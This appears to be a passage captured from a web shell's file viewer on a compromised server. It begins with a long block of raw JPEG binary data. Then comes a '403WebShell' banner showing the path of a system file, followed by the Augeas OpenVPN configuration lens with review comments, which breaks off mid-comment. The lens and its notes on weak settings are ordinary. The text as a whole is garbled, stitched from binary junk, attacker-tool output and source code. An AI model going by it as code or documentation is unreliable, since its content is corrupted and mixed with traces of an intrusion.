JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! 
pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 
6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! 
Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR 
DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
Current File : /usr/share/augeas/lenses/dist/openvpn.aug
(* OpenVPN module for Augeas
 Author: Raphael Pinson <raphink@gmail.com>
 Author: Justin Akers <dafugg@gmail.com>

 Reference: http://openvpn.net/index.php/documentation/howto.html
 Reference: https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage

 TODO: Inline file support
*)


module OpenVPN =
  autoload xfm

(************************************************************************
 *                           USEFUL PRIMITIVES
 *************************************************************************)

(* End-of-line and indentation lenses, re-exported from the stock Util
   module under short local names. *)
let eol    = Util.eol
(* NOTE(review): indent is not referenced by any other definition visible
   in this module. Every entry builder below starts directly with its key,
   so an option line with leading whitespace is presumably not accepted;
   confirm against the lens tests. *)
let indent = Util.indent

(* Define separators *)
(* sep is placed between a keyword and each of its arguments by all entry
   builders below. Its exact whitespace handling lives in Util, not here. *)
let sep    = Util.del_ws_spc

(* Define value regexps.
   Custom simplified ipv6 used instead of Rx.ipv6 as the augeas Travis instances
   are limited to 2GB of memory. Using 'ipv6_re = Rx.ipv6' consumes an extra
   2GB of memory and thus the test is OOM-killed.
*)
(* ipv6_re is a shape check only: any non-empty run of hex digits and
   colons matches, including a lone colon or a bare hex word. A value that
   parsed through this lens is therefore not proof of a well-formed IPv6
   address; tools that act on the tree should validate addresses again. *)
let ipv6_re = /[0-9A-Fa-f:]+/
let ipv4_re = Rx.ipv4
(* ip_re inherits the permissiveness of ipv6_re through the union. *)
let ip_re  = ipv4_re|ipv6_re
let num_re = Rx.integer
(* fn_re: one or more characters; the first and last may not be a hash,
   semicolon, space, tab or newline, while interior characters may include
   spaces and tabs. It is used for file names and, further down, for
   free-form command lines, so it performs no path or command validation. *)
let fn_re  = /[^#; \t\n][^#;\n]*[^#; \t\n]|[^#; \t\n]/
(* fn_safe_re: like fn_re but with no whitespace at all (carriage return
   included). Used where a file name is followed by another argument. *)
let fn_safe_re = /[^#; \t\r\n]+/
(* an_re: a lowercase letter followed by lowercase letters, digits,
   underscore or hyphen. *)
let an_re  = /[a-z][a-z0-9_-]*/
let hn_re  = Rx.hostname
(* port_re: digits only, with no range check; 0 and values above 65535
   match as well. *)
let port_re = /[0-9]+/
let host_re = ip_re|hn_re
let proto_re = /(tcp|udp)/
let proto_ext_re = /(udp|tcp-client|tcp-server)/
(* alg_re: the literal none, or a name that starts with a letter. The single
   lens below uses it for both cipher and auth, so a configuration that sets
   either of them to none parses cleanly. The lens checks syntax, not
   policy; flagging none is the job of whatever consumes the tree. *)
let alg_re = /(none|[A-Za-z][A-Za-z0-9-]+)/
(* ipv6_bits_re: ipv6_re, a slash, then digits. The prefix length is not
   range-checked. *)
let ipv6_bits_re = ipv6_re . /\/[0-9]+/

(* Define store aliases *)
(* Each alias stores the matched text as the value of the enclosing tree
   node. None of them normalises or validates beyond the regexp it wraps. *)
let ip     = store ip_re
let num    = store num_re
(* filename may contain interior spaces (see fn_re); filename_safe may not. *)
let filename = store fn_re
let filename_safe = store fn_safe_re
let hostname = store hn_re
(* sto_to_dquote: any non-empty text without a double quote or newline.
   Used by push below for the quoted directive text. *)
let sto_to_dquote = store /[^"\n]+/   (* " Emacs, relax *)
let port = store port_re
let host = store host_re
let proto = store proto_re
let proto_ext = store proto_ext_re

(* define comments and empty lines *)
(* A full-line comment: optional blanks, then a semicolon or hash, then
   optional blanks. The second argument is the text Util.comment_generic
   is given as the default prefix. *)
let comment = Util.comment_generic /[ \t]*[;#][ \t]*/ "# "
(* Terminator for every entry: either a plain end of line or a trailing
   comment that uses the same semicolon or hash markers. *)
let comment_or_eol = eol | Util.comment_generic /[ \t]*[;#][ \t]*/ " # "

let empty   = Util.empty


(************************************************************************
 *                               SINGLE VALUES
 *
 *   - local => IP|hostname
 *   - port  => num
 *   - proto => udp|tcp-client|tcp-server
 *   - proto-force => udp|tcp
 *   - mode  => p2p|server
 *   - dev   => (tun|tap)\d*
 *   - dev-node => filename
 *   - ca    => filename
 *   - config => filename
 *   - cert  => filename
 *   - key   => filename
 *   - dh    => filename
 *   - ifconfig-pool-persist => filename
 *   - learn-address => filename
 *   - cipher => [A-Z0-9-]+
 *   - max-clients => num
 *   - user  => alphanum
 *   - group => alphanum
 *   - status => filename
 *   - log   => filename
 *   - log-append => filename
 *   - client-config-dir => filename
 *   - verb => num
 *   - mute => num
 *   - fragment => num
 *   - mssfix   => num
 *   - connect-retry num
 *   - connect-retry-max num
 *   - connect-timeout num
 *   - http-proxy-timeout num
 *   - max-routes num
 *   - ns-cert-type => "server"
 *   - resolv-retry => "infinite"
 *   - script-security => [0-3] (execve|system)?
 *   - ipchange => command
 *   - topology => type
 *************************************************************************)

(* Keywords whose single value is matched against host_re by single.
   NOTE(review): tls-remote is a peer-identity check that newer OpenVPN
   releases replace with verify-x509-name; confirm which releases the
   managed hosts run before relying on either node in an audit. *)
let single_host = "local" | "tls-remote"
(* Keyword whose single value is matched against ip_re by single. *)
let single_ip   = "lladdr"
(* Keywords whose single value is an address with a prefix length
   (ipv6_bits_re). *)
let single_ipv6_bits = "iroute-ipv6"
                     | "server-ipv6"
                     | "ifconfig-ipv6-pool"
(* Keywords whose single value is matched against num_re by single.
   resolv-retry appears here for its numeric form; single adds a second
   alternative for the literal infinite. The values are not range-checked
   by the lens, which matters for settings such as keysize, reneg-sec or
   tls-timeout where a consumer may want to enforce minimum or maximum
   values. *)
let single_num = "port"
               | "max-clients"
               | "verb"
               | "mute"
               | "fragment"
               | "mssfix"
               | "connect-retry"
               | "connect-retry-max"
               | "connect-timeout"
               | "http-proxy-timeout"
               | "resolv-retry"
               | "lport"
               | "rport"
               | "max-routes"
               | "max-routes-per-client"
               | "route-metric"
               | "tun-mtu"
               | "tun-mtu-extra"
               | "shaper"
               | "ping"
               | "ping-exit"
               | "ping-restart"
               | "sndbuf"
               | "rcvbuf"
               | "txqueuelen"
               | "link-mtu"
               | "nice"
               | "management-log-cache"
               | "bcast-buffers"
               | "tcp-queue-limit"
               | "server-poll-timeout"
               | "keysize"
               | "pkcs11-pin-cache"
               | "tls-timeout"
               | "reneg-bytes"
               | "reneg-pkts"
               | "reneg-sec"
               | "hand-window"
               | "tran-window"
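(* Keywords whose single value is matched against fn_re by single, i.e. a
   file or directory path that may contain interior spaces.

   The original list named ca and client-config-dir twice. Duplicate
   alternatives in a union match the same strings, so they are dropped here
   without changing what the lens accepts.

   Several of these point at sensitive material (key, pkcs12, askpass) or
   change the process environment (chroot, cd). The lens stores the path
   text only: it does not check that the file exists, who owns it, or how
   it is protected. config names a further configuration file, which this
   lens does not follow. *)
let single_fn   = "ca"
                | "cert"
                | "extra-certs"
                | "config"
                | "key"
                | "dh"
                | "log"
                | "log-append"
                | "client-config-dir"
                | "dev-node"
                | "cd"
                | "chroot"
                | "writepid"
                | "tmp-dir"
                | "replay-persist"
                | "capath"
                | "pkcs12"
                | "pkcs11-id"
                | "askpass"
                | "tls-export-cert"
                | "x509-track"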
(* Keywords whose single value is an account or group name matched against
   an_re. user and group are the privilege-drop settings; a tree without
   these nodes means the file does not set them. *)
let single_an  = "user"
               | "group"
               | "management-client-user"
               | "management-client-group"
(* Keywords whose single value is free-form text matched against fn_re by
   single, so interior spaces and arguments are accepted as-is.

   Most of these name a script or command line that OpenVPN runs at a given
   event (for example up, down, route-up, client-connect, tls-verify),
   subject to the script-security level. The lens records the text and does
   not inspect it. When this lens backs a configuration audit, these nodes
   and the script-security node are the ones to review together. *)
let single_cmd = "ipchange"
                | "iproute"
                | "route-up"
                | "route-pre-down"
                | "mark"
                | "up"
                | "down"
                | "setcon"
                | "echo"
                | "client-connect"
                | "client-disconnect"
                | "learn-address"
                | "tls-verify"

(* single_entry kw re
   Builds a node keyed by the keyword kw whose value is the text matched by
   re. The keyword and the value are separated by sep and the line ends in
   comment_or_eol. *)
let single_entry (kw:regexp) (re:regexp) =
  let value = store re in
    [ key kw . sep . value . comment_or_eol ]

(* single_opt_entry kw re
   Same as single_entry, except that the separator and value may be absent
   altogether, giving a node with a key and no value. *)
let single_opt_entry (kw:regexp) (re:regexp) =
  let opt_value = (sep . store re)? in
    [ key kw . opt_value . comment_or_eol ]

(* single: union of every option written as a keyword plus exactly one
   value. The first seven alternatives cover the keyword groups defined
   above; the rest are options with their own value pattern.

   The patterns constrain syntax only. Values that weaken the tunnel, such
   as none for cipher or auth (allowed by alg_re) or a high script-security
   level, are parsed like any other value. *)
let single =
    single_entry single_num num_re
  | single_entry single_fn  fn_re
  | single_entry single_an  an_re
  | single_entry single_host host_re
  | single_entry single_ip ip_re
  | single_entry single_ipv6_bits ipv6_bits_re
  | single_entry single_cmd fn_re
  (* transport, mode and device *)
  | single_entry "proto"    proto_ext_re
  | single_entry "proto-force"    proto_re
  | single_entry "mode"    /(p2p|server)/
  | single_entry "dev"      /(tun|tap)[0-9]*|null/
  | single_entry "dev-type"      /(tun|tap)/
  | single_entry "topology"      /(net30|p2p|subnet)/
  (* data-channel algorithms; both accept the literal none *)
  | single_entry "cipher" alg_re
  | single_entry "auth" alg_re
  (* second form of resolv-retry; the numeric form is in single_num *)
  | single_entry "resolv-retry" "infinite"
  (* level 0 to 3, optionally followed by execve or system *)
  | single_entry "script-security" /[0-3]( execve| system)?/
  | single_entry "route-gateway" (host_re|/dhcp/)
  | single_entry "mtu-disc" /(no|maybe|yes)/
  | single_entry "remap-usr1" /SIG(HUP|TERM)/
  | single_entry "socket-flags" /(TCP_NODELAY)/
  | single_entry "auth-retry" /(none|nointeract|interact)/
  (* TLS and PKCS#11 settings *)
  | single_entry "tls-version-max" Rx.decimal
  | single_entry "verify-hash" /([A-Za-z0-9]{2}:)+[A-Za-z0-9]{2}/
  | single_entry "pkcs11-cert-private" /[01]/
  | single_entry "pkcs11-protected-authentication" /[01]/
  | single_entry "pkcs11-private-mode" /[A-Za-z0-9]+/
  | single_entry "key-method" /[12]/
  | single_entry "ns-cert-type" /(client|server)/
  | single_entry "remote-cert-tls" /(client|server)/

(* single_opt: options whose single value may be omitted.
   auth-user-pass optionally names a file; per the OpenVPN manual that file
   holds a user name and password in clear text, so where the node has a
   value the referenced file and its permissions are worth checking. The
   lens itself stores only the path. *)
let single_opt  = single_opt_entry "comp-lzo" /(yes|no|adaptive)/
                | single_opt_entry "syslog" fn_re
                | single_opt_entry "daemon" fn_re
                | single_opt_entry "auth-user-pass" fn_re
                | single_opt_entry "explicit-exit-notify" num_re
                | single_opt_entry "engine" fn_re

(************************************************************************
 *                               DOUBLE VALUES
 *************************************************************************)

(* double_entry kw a aval b bval
   Builds a node keyed by kw with two child nodes: one labelled a holding
   the text matched by aval, one labelled b holding the text matched by
   bval. Both arguments are required. *)
let double_entry (kw:regexp) (a:string) (aval:regexp) (b:string) (bval:regexp) =
  let first  = [ label a . store aval ] in
  let second = [ label b . store bval ] in
    [ key kw . sep . first . sep . second . comment_or_eol ]

(* double_secopt_entry kw a aval b bval
   Same shape as double_entry, but the second argument, together with its
   separator, is optional. *)
let double_secopt_entry (kw:regexp) (a:string) (aval:regexp) (b:string) (bval:regexp) =
  let first  = [ label a . store aval ] in
  let second = (sep . [ label b . store bval ])? in
    [ key kw . sep . first . second . comment_or_eol ]


(* double: options taking two arguments, the second optional for the
   double_secopt_entry alternatives.

   secret names a static key file and stores its path under file; the lens
   does not look at the key itself.
   NOTE(review): verify-x509-name matches its name argument against hn_re.
   A full certificate subject, as used with type subject, presumably does
   not fit a host-name pattern; confirm against Rx.hostname before relying
   on this entry to parse such lines. *)
let double  = double_entry "keepalive" "ping" num_re "timeout" num_re
            | double_entry "hash-size" "real" num_re "virtual" num_re
            | double_entry "ifconfig" "local" ip_re "remote" ip_re
            | double_entry "connect-freq" "num" num_re "sec" num_re
            | double_entry "verify-x509-name" "name" hn_re "type"
                /(subject|name|name-prefix)/
            | double_entry "ifconfig-ipv6" "address" ipv6_bits_re "remote" ipv6_re
            | double_entry "ifconfig-ipv6-push" "address" ipv6_bits_re "remote" ipv6_re
            | double_secopt_entry "iroute" "local" ip_re "netmask" ip_re
            | double_secopt_entry "stale-routes-check" "age" num_re "interval" num_re
            | double_secopt_entry "ifconfig-pool-persist"
                "file" fn_safe_re "seconds" num_re
            | double_secopt_entry "secret" "file" fn_safe_re "direction" /[01]/
            | double_secopt_entry "prng" "algorithm" alg_re "nsl" num_re
            | double_secopt_entry "replay-window" "window-size" num_re "seconds" num_re


(************************************************************************
 *                               FLAGS
 *************************************************************************)

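(* flag_words: options written as a bare keyword with no argument.

   The original list repeated client-to-client, duplicate-cn, persist-tun,
   nobind and mute-replay-warnings. Duplicate alternatives in a union match
   the same strings, so each keyword is listed once here; the set of
   accepted keywords is unchanged.

   Several flags relax a protection when present, for example
   client-cert-not-required, no-replay, no-iv and duplicate-cn. The lens
   treats all flags alike; a consumer that audits configurations has to
   single these out itself.

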